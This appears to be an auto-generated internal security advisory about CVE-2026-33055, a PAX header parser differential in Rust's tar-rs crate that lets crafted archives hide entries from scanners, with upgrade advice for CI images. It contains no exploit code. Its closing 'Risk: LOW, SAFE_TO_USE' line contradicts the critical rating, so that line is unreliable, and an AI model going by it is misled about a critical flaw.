FIND-20260330-012 · 2026-03-30 · Innovation Veille

Cargo tar-rs CVE-2026-33055 (CVSS 9.4 Critical) — archive smuggling via PAX header parser differential

cve HIGH
CVE-2026-33055 (CVSS 9.4 CRITICAL) in the Rust tar-rs crate (≤ 0.4.44) allows attackers to smuggle hidden TAR entries past security validators via non-compliant handling of PAX extended header size overrides. Compliant tools like GNU tar and Go's archive/tar override PAX size unconditionally, but tar-rs conditionally skips the PAX size when the base header size is nonzero — causing the two parsers to desynchronize their view of archive structure. A crafted crate can hide malicious payload entries that tar-rs extracts while security scanners skip them. Fixed in tar-rs 0.4.45, shipped in Rust 1.94.1. Separate from CVE-2026-33056 (symlink chmod).

Source

https://rustsec.org/advisories/

ODS Impact

Any ODS CI build environment using Rust ≤ 1.94.0 and pulling crates from private or third-party registries (not just crates.io) is vulnerable. crates.io audited all published crates and confirmed no exploitation, but internal registries or Git dependencies are not covered. Upgrade Rust toolchain to 1.94.1+ in all GitHub Actions runners and Docker build images immediately.

Security Review

License: MIT / Apache-2.0 | Maintenance: ACTIVE | Risk: LOW | Recommendation: SAFE_TO_USE

Tags

rust cargo tar cve critical supply-chain parser-differential ci
Generated by ODS Innovation Veille · 2026-03-30T07:10:02+00:00